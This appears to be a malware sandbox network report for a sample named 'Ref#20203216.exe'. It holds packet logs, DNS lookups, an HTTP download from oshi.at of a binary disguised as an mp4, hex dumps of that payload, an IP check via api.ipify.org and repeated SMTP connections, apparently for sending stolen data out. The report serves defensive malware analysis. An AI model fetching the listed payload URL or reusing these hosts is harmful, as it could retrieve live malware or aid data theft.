                                                                                                Dec 23, 2024 09:09:08.152328014 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.152435064 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.154639959 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.154721022 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.156831980 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.156900883 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.158174038 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.158292055 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.160480022 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.160535097 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.162681103 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.162863970 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.163981915 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.164091110 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.166294098 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.166558027 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.168474913 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.168571949 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.170813084 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.170921087 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.172147036 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.172250032 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.174310923 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.174443960 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.174587011 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.176989079 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.177045107 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.177066088 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.177114010 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.178757906 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.178874969 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.181013107 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.181071997 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.183021069 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.183114052 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.184506893 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.184575081 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.187057972 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.187139034 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.188833952 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.188925028 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.190640926 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.190891027 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.220773935 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.220848083 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.222210884 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.222377062 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.223495007 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.223603010 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.225828886 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.225945950 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.228030920 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.228096962 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.229312897 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.229484081 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.334723949 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.334969997 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.336277962 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.336353064 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.336399078 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.338749886 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.338830948 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.338840961 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.338901043 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.340900898 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.341038942 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.342202902 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.342293024 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.344511986 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.344578028 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.346767902 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.346852064 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.348026037 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.348093033 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.350400925 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.350474119 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.352648973 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.352776051 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.353913069 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.354032993 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.356184006 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.356256962 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.358388901 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.358448982 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.360742092 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.360881090 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.362054110 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.362122059 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.364185095 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.364262104 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.366600990 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.366703987 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.367841005 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.368046999 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.369096994 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.369216919 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.370632887 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.370735884 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.372931957 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.372993946 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.374706030 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.374768972 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.377284050 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.377371073 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.379544973 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.379637003 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.380753994 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.380811930 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.383460999 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.383559942 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.412873983 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.412964106 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.413702011 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.413768053 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.415890932 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.415954113 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.418221951 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.418311119 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.419528961 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.419612885 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.421725988 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.421808958 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.526784897 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.526859999 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.527398109 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.527467966 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.529706955 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.529784918 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.532000065 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.532128096 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.534229040 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.534286976 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.534346104 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.534388065 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.536535978 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.536581039 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.537858963 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.537970066 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.540209055 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.540309906 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.542362928 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.542484045 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.543667078 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.543720007 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.546039104 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.546173096 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.548188925 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.548243046 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.550524950 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.550694942 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.551814079 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.551887035 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.553986073 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.554151058 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.556320906 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.556466103 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.558096886 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.558294058 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.559873104 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.559971094 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.562347889 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.562422037 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.564153910 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.564212084 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.565402985 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.565485001 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.566210032 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.569295883 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.569345951 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.569365025 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.569605112 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.570135117 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.570209980 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.572396994 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.572467089 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.574350119 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.574464083 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.575921059 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.576014996 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.608325005 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.608400106 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.612230062 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.612281084 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.612775087 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.612894058 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.614038944 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.614125013 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.616250992 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.616313934 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.618486881 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.618581057 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.719716072 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.719841957 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.721884966 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.721972942 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.723274946 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.723361969 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.723468065 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.723468065 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.726702929 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:09.957381010 CET49742443192.168.2.4104.26.13.205
                                                                                                Dec 23, 2024 09:09:09.957452059 CET44349742104.26.13.205192.168.2.4
                                                                                                Dec 23, 2024 09:09:09.957832098 CET49742443192.168.2.4104.26.13.205
                                                                                                Dec 23, 2024 09:09:09.961488962 CET49742443192.168.2.4104.26.13.205
                                                                                                Dec 23, 2024 09:09:09.961508989 CET44349742104.26.13.205192.168.2.4
                                                                                                Dec 23, 2024 09:09:11.179224968 CET44349742104.26.13.205192.168.2.4
                                                                                                Dec 23, 2024 09:09:11.179318905 CET49742443192.168.2.4104.26.13.205
                                                                                                Dec 23, 2024 09:09:11.181499958 CET49742443192.168.2.4104.26.13.205
                                                                                                Dec 23, 2024 09:09:11.181520939 CET44349742104.26.13.205192.168.2.4
                                                                                                Dec 23, 2024 09:09:11.181855917 CET44349742104.26.13.205192.168.2.4
                                                                                                Dec 23, 2024 09:09:11.234399080 CET49742443192.168.2.4104.26.13.205
                                                                                                Dec 23, 2024 09:09:11.238603115 CET49742443192.168.2.4104.26.13.205
                                                                                                Dec 23, 2024 09:09:11.279376030 CET44349742104.26.13.205192.168.2.4
                                                                                                Dec 23, 2024 09:09:11.621088028 CET44349742104.26.13.205192.168.2.4
                                                                                                Dec 23, 2024 09:09:11.621252060 CET44349742104.26.13.205192.168.2.4
                                                                                                Dec 23, 2024 09:09:11.621551037 CET49742443192.168.2.4104.26.13.205
                                                                                                Dec 23, 2024 09:09:11.624188900 CET49742443192.168.2.4104.26.13.205
                                                                                                Dec 23, 2024 09:09:12.163184881 CET49744587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:09:12.282834053 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:12.283211946 CET49744587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:09:13.472297907 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:13.472508907 CET49744587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:09:13.591979027 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:13.853276968 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:13.853657007 CET49744587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:09:13.973124981 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:14.247155905 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:14.247467995 CET49744587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:09:14.484972000 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:14.768778086 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:14.769032001 CET49744587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:09:14.888426065 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:15.150863886 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:15.151937008 CET49744587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:09:15.271414995 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:15.533761978 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:15.538384914 CET49744587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:09:15.657855988 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:15.917639971 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:15.923427105 CET49744587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:09:15.923427105 CET49744587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:09:15.923427105 CET49744587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:09:15.926793098 CET49744587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:09:16.042891026 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:16.042911053 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:16.043029070 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:16.046426058 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:16.429907084 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:09:16.484386921 CET49744587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:10:35.578607082 CET49735587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:10:35.698260069 CET58749735162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:10:35.960896015 CET58749735162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:10:35.960947037 CET58749735162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:10:35.961154938 CET49735587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:10:35.961154938 CET49735587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:10:36.080977917 CET58749735162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:10:52.187871933 CET49744587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:10:52.310506105 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:10:52.570508003 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:10:52.570699930 CET58749744162.254.34.31192.168.2.4
                                                                                                Dec 23, 2024 09:10:52.570779085 CET49744587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:10:54.086179018 CET49744587192.168.2.4162.254.34.31
                                                                                                Dec 23, 2024 09:10:54.206079960 CET58749744162.254.34.31192.168.2.4
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Dec 23, 2024 09:08:46.577495098 CET5151353192.168.2.41.1.1.1
                                                                                                Dec 23, 2024 09:08:46.911849976 CET53515131.1.1.1192.168.2.4
                                                                                                Dec 23, 2024 09:08:53.032646894 CET5747453192.168.2.41.1.1.1
                                                                                                Dec 23, 2024 09:08:53.170420885 CET53574741.1.1.1192.168.2.4
                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Dec 23, 2024 09:08:46.577495098 CET192.168.2.41.1.1.10x88c7Standard query (0)oshi.atA (IP address)IN (0x0001)false
                                                                                                Dec 23, 2024 09:08:53.032646894 CET192.168.2.41.1.1.10x6813Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Dec 23, 2024 09:08:46.911849976 CET1.1.1.1192.168.2.40x88c7No error (0)oshi.at5.253.86.15A (IP address)IN (0x0001)false
                                                                                                Dec 23, 2024 09:08:46.911849976 CET1.1.1.1192.168.2.40x88c7No error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false
                                                                                                Dec 23, 2024 09:08:53.170420885 CET1.1.1.1192.168.2.40x6813No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                Dec 23, 2024 09:08:53.170420885 CET1.1.1.1192.168.2.40x6813No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                Dec 23, 2024 09:08:53.170420885 CET1.1.1.1192.168.2.40x6813No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                • oshi.at
                                                                                                • api.ipify.org
                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.4497335.253.86.154436776C:\Users\user\Desktop\Ref#20203216.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-23 08:08:48 UTC61OUTGET /nvgU HTTP/1.1
                                                                                                Host: oshi.at
                                                                                                Connection: Keep-Alive
                                                                                                2024-12-23 08:08:49 UTC301INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 23 Dec 2024 08:08:49 GMT
                                                                                                Content-Type: video/mp4
                                                                                                Content-Length: 997896
                                                                                                Connection: close
                                                                                                Last-Modified: Mon, 23 Dec 2024 00:20:33 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                ETag: "51652c24f2733a9a3e405e7f7691ae0b"
                                                                                                Content-Disposition: attachment; filename=eFcR.mp4
                                                                                                2024-12-23 08:08:49 UTC3782INData Raw: 0e 79 27 93 9d c1 6f 5d d6 e0 ee c2 96 7d 54 75 af e3 db f0 78 c0 5b aa 3d 91 dc d0 9a 47 93 a3 4a 82 bd 96 78 8d 69 20 54 82 b4 ef db e5 86 92 6d 65 a8 05 bc e4 43 aa d3 f9 77 2a ee ac 49 05 df 85 7d 85 22 9c ad 4c 96 b2 d5 15 be cf 0f 7b 05 9b 21 3a b3 04 ac 47 e3 a2 53 8e 75 57 a7 91 97 48 91 26 4c b3 4a 3e 32 17 76 46 be a6 04 49 68 22 4d a4 6f 97 a5 56 9a da 3f c9 e6 d2 c6 51 69 40 96 92 a8 c5 b1 cb 51 d2 d0 0f 5c 67 67 d5 ce 11 94 f4 e1 a1 ed bd e1 03 1b 92 ee 4f 1f 4e 81 f7 2a c7 86 35 a1 ef d9 98 9e bc 8c 0c 9c f2 c5 71 5c ac 3a e0 83 ab 66 c0 8a 18 67 a2 58 22 2c 7f e9 a2 38 a1 e9 9b 5c 8b cd 1b 91 05 0b ff a2 b6 ff 65 af 80 9a d9 b9 e5 dd 54 8e a8 de 35 1f cc 9c 0a bd 15 5a be 61 b9 8d c8 49 93 08 3b c0 e4 f3 94 1d fc e6 e6 57 e4 f0 70 1d 65 05
                                                                                                Data Ascii: y'o]}Tux[=GJxi TmeCw*I}"L{!:GSuWH&LJ>2vFIh"MoV?Qi@Q\ggON*5q\:fgX",8\eT5ZaI;Wpe
                                                                                                2024-12-23 08:08:49 UTC4096INData Raw: b2 42 55 f4 fd 90 bc 04 43 5c 01 70 3f fb 12 d2 9e fb c8 6e 44 5a f7 73 b5 d2 b1 52 d4 94 63 62 e1 78 16 98 09 3d 17 31 a9 79 39 05 99 69 4f 4c 51 80 d8 fd 56 1f fe 25 b7 e2 1f 98 c3 a8 05 e7 2c 72 37 68 00 21 f7 b0 71 cd 46 0b e1 7c 1b 59 6d 1d fd 77 eb a0 0d 85 bc 9e 91 6e ee 45 8b 97 da b1 bd 62 ee e9 46 58 31 4d 85 35 8c 72 0d 45 d0 91 b2 5b 96 36 be 5f 6f b9 a4 fd 34 fb fa 61 1f d9 0b ab fb 43 6e ff af d9 34 98 fe 5c c6 28 01 61 b6 f2 e8 f5 2c c8 7f d2 11 dd d8 84 04 55 27 b1 5a 7d 53 b2 86 83 d4 4b f6 a7 b2 ee 60 b4 ee 54 d3 68 7c a0 d6 cd 80 9f 98 90 9c 74 64 44 24 fb 6a 29 78 5a 41 e5 c5 47 a5 1f 32 49 ed 9b 87 2e 47 b3 a9 fa 6e 96 f2 01 4e c1 3c 8a 6f 74 ca 36 82 14 07 c5 bc d3 72 2b 89 69 f3 80 3c 9b 20 0a 24 12 f0 89 66 42 38 27 f5 62 47 cc 4a
                                                                                                Data Ascii: BUC\p?nDZsRcbx=1y9iOLQV%,r7h!qF|YmwnEbFX1M5rE[6_o4aCn4\(a,U'Z}SK`Th|tdD$j)xZAG2I.GnN<ot6r+i< $fB8'bGJ
